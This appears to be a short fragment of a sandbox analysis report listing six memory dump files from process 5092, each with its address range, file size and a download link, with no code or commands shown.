memory/5092-38-0x0000000007B20000-0x0000000007B52000-memory.dmp

Filesize
200KB

Download
memory/5092-39-0x0000000070B50000-0x0000000070B9C000-memory.dmp

Filesize
304KB

Download
memory/5092-49-0x0000000007B00000-0x0000000007B1E000-memory.dmp

Filesize
120KB

Download
memory/5092-50-0x0000000007B70000-0x0000000007C13000-memory.dmp

Filesize
652KB

Download
memory/5092-51-0x0000000007D30000-0x0000000007D3A000-memory.dmp

Filesize
40KB

Download
memory/5092-52-0x0000000007F50000-0x0000000007FE6000-memory.dmp

Filesize
600KB

Download